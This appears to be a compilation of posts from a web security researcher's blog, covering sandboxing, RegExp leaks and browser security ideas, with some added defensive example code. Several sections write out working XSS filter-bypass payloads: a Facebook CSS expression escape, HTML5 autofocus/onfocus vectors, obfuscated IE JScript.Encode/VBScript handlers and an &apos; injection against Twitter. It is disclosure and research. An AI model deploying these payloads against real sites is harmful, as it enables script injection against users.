Solving the secret question problem

I love to think of unsolvable problems and try to solve them. I dunno why, I just enjoy it. One of the most challenging problems is “secret questions”. Everyone sucks at this, I’m looking at you Google. One of the first lines of defence for an unverified account can be a secret question. This is why my dog is called “mi(mqure~sb$ztrcjeoosc*m;wbyowdd@” online.

How to solve it? Well at first I thought of questions like “Which picture do you have in the front room of your house?” but there are problems. Like anyone can visit your house and see the picture or look through your window. The physical aspect of them having to do that though reduces the likelihood of it happening unless they really want your account. Doing this over a few accounts is also less likely because you’d need to visit all their houses.

Or do you? Damn you flickr. People upload pictures of their houses, which makes this bad to use as part of a secret question because you can clearly piece the information together if it’s available. Bruteforcing is hard though because your automated program would need to understand the question. Unless the attacker builds an automated program that gathers the accounts and questions in various frames and can picture the correct answer. Oh dear, this is harder than it sounds. What if you decide to bin the picture? Not good, so I thought of something else.

Open your hands and look at them. Can you see the ridges between your fingers? You carry this data with you all the time; it’s hard for someone to obtain without taking a detailed picture of your hands. We can use this data! For example, instead of a question like “What is your favourite cat’s name?” the better questions would be a series of:-

“Please tell me how many ridges there are on your first finger, left hand?”
“Please tell me how many ridges there are on your fourth finger, right hand?”
“Please count the number of large ridges on your palm, right hand”

You would require more than one question at a time and you’d have to be careful about the questions chosen. I thought of ridges because they would be pretty different for each person and they wouldn’t mind disclosing the information.

Writing Hackvertor tags

My one man mission to create a social coding network is going well, if you read this blog previously you’ll remember my attempts at a JavaScript sandbox until I finally settled on JSReg as a method. I’ve refined the process of creating tags after trying to build them myself using the editor.

How to create a tag

Login to Hackvertor and click “Create tag”. This will give you a JavaScript editor with a default blank tag. I’ve added this as guidance: the first part of the sample is a simple if statement that checks the first param for something. Params are tag params that the user can change when using your tag; the editor has these three params on the left hand side so that you can test. Let’s say your tag supports one parameter and either encode or decode: place encode in the first param box and you can test that state in the editor.

You might notice that the sample tag uses an anonymous function, this makes it easier for you to return the output from the tag. You don’t need one for simple tags but I recommend you use one when developing more complex ones.

The left hand side also contains “name”, which is the name of your tag, and category, to appear in the application home page; the help text at the bottom lets you describe what your tag and params do. This is useful for the user as, before they add the tag, they can hover over it and read what it does.

Every tag extends the special object property “HV” which allows you to reuse your code and others’. Let’s say you want to reverse some text; rather than writing this yourself you can use the HV object like so:-

code = code.HV('reverse');
(123).HV('reverse')

Notice this works with any object as demonstrated in the second part of the sample code.

In order to work with user input a special variable called “code” is automatically assigned; you can test user input by placing something in the user input box above the editor. This automatically gets assigned to “code” and allows you to test your tag. Each time you modify the tag the code is automatically executed and any syntax errors will be reported.

You can also look at previous tags for inspiration.

Limitations

Like anything, the sandbox isn’t perfect. One of the most common problems you’ll encounter will be arrays. When using arrays you need to make sure you define them using Array() not [], as the sandbox assumes that [] is an object property accessor. Using the Array constructor can be tricky because Array(1) creates an array with a length of 1 but NOT with a value of 1 in the first element.

Try not to use complex for loops and avoid for..in loops where possible until the sandbox handles loops more effectively.

Special powers

I’ve added a fun element to creating tags. When you add tags in Hackvertor you get points and a special, when someone votes for your tag you get points, if a tag is malicious or bad you can get points removed. When you reach a certain status with the amount of points you’ve accumulated you’ll be able to perform a special power.

There are currently 7 special powers and depending what status you are you’ll be able to use them on weaker foes. This feature is experimental and I could remove it or change it slightly depending on the results. Points can also be negative and will be awarded if a user tries to do some vote rigging or maybe forgets to select a user to perform a special power on. You’ve been warned :)

Hackvertor API

Over the weekend Stefano Di Paola broke my JSReg sandbox with some awesome vectors in particular the Opera one. He took my challenge after I laid down the gauntlet on the web app sec list. If you have some sandbox you want breaking, some Flash you need testing or general pen test work you should hire this guy he is awesome.

I patched JSReg by removing prototype, callee and caller from the allowed properties; hopefully this will stop future attacks using this method until I can work out a way to use these safely. Then I got a bunch of great suggestions from Thornmaker and SDC that made so much sense I reworked the recent Hackvertor code to modify the Object prototype. So now Hackvertor tags can call each other easily using this method, for example:-

'abc'.HV('reverse').HV('base64',Array('encode'))
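As an added illustration (my own, not Hackvertor’s code), here is the smallest version of that Object prototype extension: a hypothetical tag registry with reverse and base64 tags, chained through a non-enumerable HV method, with the hasOwnProperty check that stops prototype names such as 'constructor' resolving to a tag. The registry layout and tag names are assumptions; it runs in Node.js.

```javascript
// Added illustration, not Hackvertor's own code. Runs in Node.js.
// Hypothetical tag registry: keys are tag names, values take the input (as a
// string) and an optional args array, mirroring 'abc'.HV('base64', Array('encode')).
const TAGS = Object.create(null);
TAGS.reverse = (input) => input.split('').reverse().join('');
TAGS.base64 = (input, args) =>
  args && args[0] === 'decode'
    ? Buffer.from(input, 'base64').toString('utf8')
    : Buffer.from(input, 'utf8').toString('base64');

// Resolve a tag by its OWN name only. Without this check a name that lives on
// the prototype chain ('constructor', '__proto__', 'toString') would come
// back from the lookup and then be called as if it were a tag.
function runTag(tagName, input, args) {
  if (typeof tagName !== 'string' ||
      !Object.prototype.hasOwnProperty.call(TAGS, tagName)) {
    return null;
  }
  return TAGS[tagName](String(input), args);
}

// Install HV on every object, as Hackvertor does, but non-enumerable so it
// does not show up in for..in loops over ordinary objects.
Object.defineProperty(Object.prototype, 'HV', {
  value: function (tagName, args) { return runTag(tagName, this, args); },
  writable: true, configurable: true, enumerable: false,
});

function hvDemo() {
  return {
    reversed: 'abc'.HV('reverse'),                         // 'cba'
    chained: 'abc'.HV('reverse').HV('base64', ['encode']), // 'Y2Jh'
    numeric: (123).HV('reverse'),                          // '321'
    blocked: 'abc'.HV('constructor'),                      // null
  };
}
```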

The API is extended further so that you can include data and share it across tags. This is super useful when creating a standard list of XSS vectors, Unicode characters, shellcode, whatever you like! The first example shows how a tag can be used to return array data. The second example shows how you can use this data within tags.

Data sample
Using the data

What’s great about this is that the data can also now be used externally: you can embed the sandbox from an external site and use your data. Of course using untrusted tags poses a risk that I’ll need to account for, but if you only use your own tags it should be pretty safe to use them for fuzzers or other data.

Here is how to embed my version of Hackvertor tags:-

<script src="http://hackvertor.co.uk/export?id=1"></script>
<script type="text/javascript">
window.onload = function() {
  var parser = JSReg.create();
  try {
    // Expose the Hackvertor tag registry inside the sandbox as the HV method.
    parser.extendObject('$HV$', (function(tags) {
      return function(tagName, args) {
        // Only tags that exist as own properties of the registry may be called.
        if (!tags.hasOwnProperty(tagName)) {
          return null;
        }
        return tags[tagName].execTag(this, function(output) { return output; }, args);
      };
    })(window.Hackvertor.tags));
    //EXECUTE YOUR OWN CODE HERE
    parser.eval("alert('abc'.HV('reverse'))");
  }
  catch (e) {
    alert(e);
  }
};
</script>

At the moment Hackvertor doesn’t have all the tags the previous one had yet but why not help out and build a security tool together in the first coding social network.

Hackvertor and JSReg

I’m not a developer any more so I find it difficult to update the experiments I’ve been working on but I managed today to upload the work I’ve done with JSReg and update Hackvertor. They are both integrated closely together because Hackvertor allows untrusted Javascript using JSReg.

The recent upgrade to JSReg allowed me to upload the Hackvertor changes I did a while ago; it is now very nice and easy to share code between users. At the moment registration is disabled but I plan to enable it once I’ve figured out a way to stop users overloading the tag list.

You can see how the integrated JSReg parser works by visiting Public Hackvertor; this will eventually replace the original one now online. There are only a limited set of tags as I’ve not had time to code them all, but we have a couple of users on there that might start adding code if they haven’t forgotten their password =)

I found the untrusted Javascript feature difficult to code as sharing each tag inside a tag for example would require some tricky Javascript but I think I’ve managed to pull it off. I’ll document the JSReg stuff here and how Hackvertor allows tag objects inside tags.

Playing nice with JSReg

In order to use the parser effectively we need to be able to inject our own objects into the sandboxed environment without compromising the security of the sandbox. To do this JSReg supports some extension functions which allow you to inject an object directly. The following code sample shows you how to do it:-

parser.extendWindow('$tags$', (function(tags) {
  return function(obj, callback) {
    var code = obj.$code$;
    var tag = obj.$tag$;
    var param1 = obj.$param1$;
    var param2 = obj.$param2$;
    var param3 = obj.$param3$;
    if (!tags.hasOwnProperty(tag)) {
      return null;
    }
    return tags[tag].execTag(code, callback, [param1, param2, param3]);
  };
})(window.Hackvertor.tags));

So here the “parser” is the JSReg parser; we use the extendWindow function to place a “$tags$” object within the sandbox. Notice the $ prefix and suffix: this is how JSReg protects objects/properties. We use a closure to send a Hackvertor Tag object to the sandbox, which passes it a function that accepts a tag object and a callback. Hackvertor now uses callbacks for each tag; this allows conversions to be run in sequence without waiting for each function to return the output.

A simplified version of this can be seen below; this time we assign a value from a DOM object outside of the sandbox to a reference inside the sandbox.

parser.extendWindow('$code$',document.getElementById('input').value);

The new Hackvertor

All tags are now user definable! Each tag can have up to three parameters, provide some help text and call existing tags from inside the sandbox :) To create a tag you simply have to return some output; inside a tag there are some special variables that are automatically assigned when a tag is called. The special variables are listed below:-

code, params, tags

The code refers to the original text passed to your tag; this could be plaintext or some text that has been transformed by a previous tag. The params is a simple numeric indexed array which refers to any params supplied by the user, so for instance if your tag supports 1 param you can refer to it inside your tag as params[0]. Tags contains the Hackvertor tag reference mentioned previously and allows you to call existing tags without having to write the same code over and over. I will show below how to call the base64 tag that currently exists in the Hackvertor tag space.

tags({code:'abc',tag:'base64',param1:'encode',param2:'',param3:''},function(result) {alert(result);})

So this will call the tags function defined by extending the sandbox; it accepts an object and callback as its arguments. I send a string ‘abc’ and use the tag ‘base64’, I supply one param ‘encode’ and then use the callback to get the result of the conversion.

My RegExp is still leaking

The great thing about standards is that sometimes they are blindly followed and it’s not until maybe years down the line that you realise they got it wrong. Personally I think standards should be organically developed in code then defined in a standard once the various flaws have been ironed out. Every standard should use code samples for every single thing they define, this way it is quite easy to spot the intention and how to abuse it.

You could argue this is already done but I disagree, we should have standard prototypes with testing code for each then we can use the code samples and the specification. The W3 decided to release a security list which is a fantastic idea but why did we take so long?

Anyway things are changing and that is cool, but onto my RegExp I think. Why the standards rant? Well, the RegExp object was defined in the specification as a global object that can access the last result, among other things, of a regular expression literal. I have no idea why; the same result could be achieved using a reference to the regular expression like so:-

a=/a/;
a.test('a');
a.lastMatch; // This doesn't work (undefined): the result isn't kept on the instance
// RegExp.lastMatch does work but shouldn't: the static is shared by every regexp

So as you can see we can access the result of an expression even without a reference to the variable. This is bad when we start mixing untrusted javascript in the future, as we don’t want to expose other matches to different untrusted code. What’s new, I hear you say? I posted about this before…well, don’t you know that some browsers had the crazy idea of supporting regular expressions as a function? Yeah, true: for some crazy reason rather than a regular expression being a regexp object it is a function! I would like, for example, the following code to return my user agent string please:-

javascript:alert(/.+/());

I’m not a crazy man, honest :) Let’s visit mmm apples, use Safari and type the string above in the url bar. What do we get? The user agent! If you look at the source code of the page, you’ll find that they use an external javascript file which runs a regexp match on the user agent. Because this is the lastMatch and we didn’t provide a string to the regexp in the function arguments, it decides to return the lastMatch instead of the input we provide. Nice.

This works on Google Chrome too, you might get different results with Firefox if you have noscript installed because it runs RegExp matches on parts of the page.
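The leak described above, as an added example that is not part of the original post: a trusted function matches on data it means to keep private, an unrelated function later reads the RegExp statics, and a scrub step shows the one mitigation available to code that cannot avoid doing the match. The user agent string is a constructed sample; it runs in Node.js.

```javascript
// Added example, not from the original post. RegExp's legacy static
// properties (RegExp.lastMatch, RegExp.$1, ...) record the most recent
// successful match made by ANY regular expression in the realm, so a match
// done by trusted code is readable afterwards by unrelated code.

// Trusted code matches on data that should stay private and returns only
// the part it intends to expose.
function trustedMatch(userAgent) {
  const m = /Mozilla\/[\d.]+ \(([^)]+)\)/.exec(userAgent);
  return m ? m[1] : null;
}

// Unrelated code later: it never received the input or the regexp above.
function leakedFromStatics() {
  return { lastMatch: RegExp.lastMatch, group1: RegExp.$1 };
}

// Mitigation for code that must do sensitive matches: overwrite the statics
// with a harmless match before handing control to anything else.
function scrubRegExpStatics() {
  /(?:)/.exec('');
}

function regexpLeakDemo() {
  const ua = 'Mozilla/5.0 (secret-device; build 42)'; // constructed sample
  const exposed = trustedMatch(ua);       // 'secret-device; build 42'
  const leaked = leakedFromStatics();     // the whole UA is still readable here
  scrubRegExpStatics();
  const afterScrub = leakedFromStatics(); // lastMatch and $1 are '' now
  return { exposed, leaked, afterScrub };
}
```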

The safety net

I was thinking lately about how to prevent a user being exploited by whatever method. One thing most attacks have in common is that a user generally needs to initiate the attack by clicking on an email or web site link from a social network. There’s an obvious pattern here. Granted some attacks are conducted on the application itself, an XSS worm or network worm for example, but these aren’t as common as the majority of attacks that require some form of initiation.

My solution? The safety net! When your average joe clicks on a link from twitter, they usually want to watch a funny video or something. Using this to its advantage the safety net detects when this happens; it is aware of the context of an email, for example, or that this particular social network is quite popular. When a user clicks a link from that context the browser doesn’t need to send any cookie related information from anywhere whilst in the “Safety net”.

It acts as a sandbox for the user, protecting them from bad stuff; the user should be aware that they’re in it and should not be able to browse like normal unless they open a new window in the traditional means. It could also work for phishing, prompting the user not to enter any confidential information or maybe disabling form input completely except for whitelisted sources. Corporations could configure their safety net to be more restrictive, a policy for disabling javascript for example, or maybe only allowing Flash to play video and not execute actionscript.

If anyone thinks this idea isn’t too crazy and decides to implement it, here are a couple of suggestions. I’ll refer to the Safety net as SN:-

1. Whilst in the SN any executed javascript or other code should always remain in the SN.
2. New windows or frames should not be allowed in the SN.
3. The browser should look different in the SN to inform the user that they are in a more restrictive browsing experience.
4. Closing the SN should be the only way out of it and the user must be clear that is what is happening.
5. Form input could be restricted in the SN.
6. Session data or cookies should not be transferred from/to the SN.
7. ANY form of download should not be permitted in the SN.
8. Third party plugins should only be allowed in restricted mode; for example a PDF file should have a restricted mode in which many features are disabled, like javascript. Only if this mode is enabled would the PDF be allowed to execute.
9. Full screen mode should be prevented.
10. In the SN it is the equivalent of opening the browser for the first time.

Additionally I suggest a meta tag to identify social networks:-

<meta name="identify" content="Social Network" />

Facebook sandbox escape

My friend mario (he who never blogs) found XSS in facebook a couple of times. This tempted me to look at their sandbox; I didn’t register for an account but just tried breaking their FBML console.

They have their own FBML (Facebook markup language) which is just basic HTML/CSS, and a separate Javascript sandbox which restricts what you can execute and access by scoping everything to the app ID. I didn’t need to break their Javascript sandbox as breaking the FBML would allow me to execute any code and access the document source etc.

I thought the best way to beat the sandbox would be through css expressions as they use the IE7 compat header. I tested their console a couple of times and in 10 minutes found that they fail to parse CSS comments correctly. Next followed incorrectly html encoded quotes, so I had the right tools to break out of there but I needed to execute Javascript. They allowed stuff like xpression() but I tried double encoding expression in various ways and they seemed to catch it ok. Then I checked their charset, which I presumed was UTF-8, and it is :) I used my old trick of placing a UTF-8 BOM character before the “e” in expression and boom, I had a bypass. The first one didn’t work because the quote was in the wrong place but I knew that with a little modification it would work, and the final vector is below:-

<div style=background-image:url('http://&quot;);xss/**/&#x3a;&#65279expression(alert(1));+&quot;')!important;></div>

Note the &#65279 needed to be the actual character in order to break the sandbox, but the vector should execute as is anyway and it was easier to see this way. The !important part isn’t required but I just thought I’d assign priority :) The vector has now been fixed by Facebook.

Facebook vector
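The filter-side lesson from the vector above, as an added example (mine, not Facebook’s fix): a keyword check over CSS has to normalise the value first, because a CSS comment, an HTML-encoded quote and a U+FEFF glued to the identifier each leave “expression” invisible to a tokeniser while IE still ran it. The normalisation order is my assumption; the sample is a constructed copy of the page’s vector with the BOM as a real character, and it runs in Node.js.

```javascript
// Added example, not Facebook's code: normalise before you match.
// A tokeniser-style check: CSS identifiers may contain non-ASCII characters,
// so "\uFEFFexpression" is ONE identifier that is not equal to "expression".
const IDENT_RE = /[a-z_\u0080-\uffff][\w\u0080-\uffff-]*/gi;
function naiveHasExpression(css) {
  return (css.match(IDENT_RE) || []).some((id) => id.toLowerCase() === 'expression');
}

function normaliseCss(css) {
  return css
    // 1. decode numeric and quote entities (semicolon optional, as in &#65279e)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&quot;/gi, '"')
    // 2. remove CSS comments, which the browser drops even inside a declaration
    .replace(/\/\*[\s\S]*?\*\//g, '')
    // 3. drop BOM and zero-width characters that IE ignored inside identifiers
    .replace(/[\uFEFF\u200B-\u200D]/g, '');
}

// Same check, run on the normalised value.
function hardenedHasExpression(css) {
  return naiveHasExpression(normaliseCss(css));
}

// Constructed from the vector above, with the BOM as a real character
// (the post notes it had to be the actual character to break the sandbox).
const SAMPLE_CSS =
  "background-image:url('http://&quot;);xss/**/&#x3a;\uFEFFexpression(alert(1));+&quot;')!important;";
```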

HTML5 new XSS vectors

So I posted some new XSS vectors on twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now :) We have a brand new way of auto executing XSS.

Normally when you find an XSS hole within an input element that has filtered < and > you can’t exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT>

Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)>

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. It seems you can use this method with any form based element:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

Ping pong obfuscation

This is a fun post about a feature I found in IE that allows you to do some crazy obfuscation. I’ll start off with some simple examples:-

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

So here we’re not obfuscating, but I’m showing how IE accepts the language attribute and a labelled vbs statement to change the event to allow vbscript instead of javascript. Ok, so let’s play a little ping pong:-

execScript("MsgBox 1","vbscript"); //executes vbs from js
execScript('execScript "alert(1)","javascript"',"vbscript");

Look how we can call vbscript from javascript by using execScript, and then look how we can execute from javascript to vbscript and then back to javascript again! So now we’re playing some ping pong, but how can we make our little game hidden?

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>

Wait what? Yeah IE supports jscript.encode within the language attribute. Remember jscript.encode? ah the old ones are the best :) That’s it right? Well….

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

Yeah, you can use VBScript.Encode and Javascript.Encode as labels within an event! You might be going WTF right now and I can understand it because I did exactly the same, but it would be silly to finish now without finishing our game of ping pong. How many rallies shall I do? I think 3 should be enough….

<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;&#x54;&#x41;&#x41;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x6e;&#x58;&#x2b;&#x5e;&#x55;&#x6d;&#x4d;&#x6b;&#x77;&#x44;&#x60;&#x72;&#x3a;&#x40;&#x24;&#x3f;&#x37;&#x33;&#x68;&#x7a;&#x62;&#x29;&#x29;&#x7b;&#x27;&#x5a;&#x25;&#x51;&#x52;&#x47;&#x3d;&#x32;&#x9;&#x56;&#x37;&#x57;&#x42;&#x20;&#x71;&#x64;&#x47;&#x5c;&#x3a;&#x32;&#x6a;&#x62;&#x65;&#x62;&#x7a;&#x29;&#x27;&#x7b;&#x37;&#x3a;&#x3d;&#x40;&#x24;&#x4a;&#x7e;&#x45;&#x25;&#x6b;&#x6d;&#x2e;&#x6b;&#x61;&#x4f;&#x63;&#x2b;&#x55;&#x31;&#x57;&#x39;&#x2b;&#x4a;&#x2a;&#x43;&#x52;&#x63;&#x41;&#x41;&#x41;&#x3d;&#x3d;&#x5e;&#x23;&#x7e;&#x40;">

Ok so I go to:-
jscript->jscript.encode->jscript.encode->jscript.encode->hex entities
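For the defender’s side of the two posts above (the autofocus handlers and the language/label/encoded tricks), here is an added detection pass that is not part of the original posts: it walks the attributes of untrusted HTML, decodes numeric entities the way the browser does before the script engine sees a handler, and flags on* handlers, language switches, script-engine labels and the Script Encoder marker. The attribute parser is deliberately small and is an illustration, not a sanitizer; the samples are constructed copies of the page’s vectors with the long encoded blob cut short.

```javascript
// Added example, not from the original posts. Runs in Node.js.
// Decode &#NNN; and &#xHH; (semicolon optional) like an HTML parser would.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);?/gi, (m, body) => {
    const cp = body[0].toLowerCase() === 'x' ? parseInt(body.slice(1), 16) : parseInt(body, 10);
    return Number.isNaN(cp) ? m : String.fromCodePoint(cp);
  });
}

// name, then optional ="..." | ='...' | =bare (bare may hold '=' as lenient browsers allow).
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>`]+)))?/g;
// Script-engine labels IE accepts in front of handler code.
const LABEL_RE = /^\s*(?:vbs|vbscript|jscript|javascript|jscript\.encode|vbscript\.encode|javascript\.encode)\s*:/i;
const ENCODED_MARKER = '#@~^'; // start of a Script Encoder (JScript.Encode/VBScript.Encode) blob

function scanHtml(html) {
  const findings = [];
  const tagRe = /<([a-z][\w-]*)\b([^>]*)>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const tagName = tag[1].toLowerCase();
    ATTR_RE.lastIndex = 0;
    let attr;
    while ((attr = ATTR_RE.exec(tag[2])) !== null) {
      const name = attr[1].toLowerCase();
      const raw = attr[2] ?? attr[3] ?? attr[4] ?? '';
      const value = decodeNumericEntities(raw); // what the script engine will see
      const reasons = [];
      if (name.startsWith('on')) {
        reasons.push('event-handler');
        if (LABEL_RE.test(value)) reasons.push('script-label');
        if (value.includes(ENCODED_MARKER)) reasons.push('encoded-script');
        if (raw !== value) reasons.push('entity-encoded');
      } else if (name === 'language') {
        reasons.push('language-switch');
      } else if (name === 'autofocus') {
        reasons.push('autofocus');
      }
      if (reasons.length) findings.push({ tag: tagName, attr: name, reasons });
    }
  }
  return findings;
}

// Constructed samples from the vectors above; the last keeps only the first
// few entities of the encoded blob, so it is inert.
const SAMPLES = [
  '<input autofocus onfocus=alert(1)>',
  '<img src=1 onerror=vbs:msgbox+1>',
  '<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">test</a>',
  '<body onload="&#x6a;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x2e;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x3a;&#x23;&#x40;&#x7e;&#x5e;">',
];

function scanSamples() {
  return SAMPLES.flatMap(scanHtml);
}
```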

Twitter misidentifying context

This is an important post for me, not because it’s ground breaking but because people don’t seem to get this when using data in a certain context. If you are a dev please read this, and read it until you understand it, because if you misidentify context you fail, and you fail pretty badly.

I reported this to twitter about two months ago, they responded and fixed four xss holes but two remain and they didn’t contact me to test the fix.

When you are including user input inside a javascript event within a string what do you have to escape? If you answered: '"<>\
You are wrong. Twitter is wrong.

Take the following example:-

<a href=# onclick="x= 'USERINPUT' ">test</a>

So you can place your input within the single quotes and there is a place on twitter that does this:-
twitterTheseResults(' \&quot;\'xss','/search?q=&a…

Here they are escaping &quot; with \&quot; and ' with \'. But that isn’t enough! Why? Because it’s a javascript onclick event! Inside an event you have to escape entities! All of them!

Consider the following vector:-
&apos;,alert(1),&apos;

No single quotes but &apos; still acts as one. Please look at this test and make sure you understand how it works:-
http://tinyurl.com/xssyoda

Don’t forget other entities work too: &#39; &#x27; &#39 &#x27, so make sure you escape all characters within a js event like so:-

<a href="#" onclick="x='USERINPUT\x27\x22\x3c\x3e'">test</a>

and Twitter PLEASE fix this and related holes c’mon it’s been two months, it’s not rocket science to fix.

&apos; works on non-IE browsers but the other entities mentioned work fine on IE too.
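The context mix-up above, as an added example that is not part of the original post: the escaper the post describes Twitter using is run beside the \xHH escaper the post recommends, through a small model of the browser’s attribute entity decoding, so you can see that &apos; only becomes a quote for the first one. decodeEntities() is my simplified stand-in for the browser step, not a full HTML parser; it runs in Node.js.

```javascript
// Added example, not Twitter's code. The browser decodes HTML entities in an
// attribute value BEFORE the JS engine parses the handler, so escaping must
// happen at the JS layer in a way that survives that decoding.

// The escaping the post describes Twitter using: backslash the usual suspects.
function naiveJsEscape(s) {
  return s.replace(/["'<>\\]/g, (c) => '\\' + c);
}

// Hardened: \xHH / \uHHHH every non-alphanumeric unit, so neither a quote nor
// an '&' (the start of an entity) reaches the attribute value at all.
function jsStringInEventEscape(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const cu = c.charCodeAt(0);
    return cu < 0x100 ? '\\x' + cu.toString(16).padStart(2, '0')
                      : '\\u' + cu.toString(16).padStart(4, '0');
  });
}

// Model of attribute-value entity decoding: named and numeric, semicolon
// optional (the post notes &#39 and &#x27 also work).
function decodeEntities(s) {
  const named = { apos: "'", quot: '"', lt: '<', gt: '>', amp: '&' };
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    const key = name.toLowerCase();
    return Object.prototype.hasOwnProperty.call(named, key) ? named[key] : m;
  });
}

// Build onclick="x='USERINPUT'" as on the page and return the JS source the
// engine actually sees after the browser's entity decoding.
function renderHandler(userInput, escapeFn) {
  return decodeEntities("x='" + escapeFn(userInput) + "'");
}

// True if the text between the two delimiting quotes still contains an
// unescaped single quote, i.e. the string literal was broken out of.
function breaksOutOfString(jsSource) {
  const inner = jsSource.slice(3, -1);
  return /(^|[^\\])'/.test(inner);
}

// Run the hardened handler source and return the value x ends up holding:
// the user's text comes back intact, as data rather than code.
function roundTrip(userInput) {
  return new Function('var ' + renderHandler(userInput, jsStringInEventEscape) + '; return x;')();
}

const VECTOR = "&apos;,alert(1),&apos;"; // the post's vector, copied as a constructed sample
```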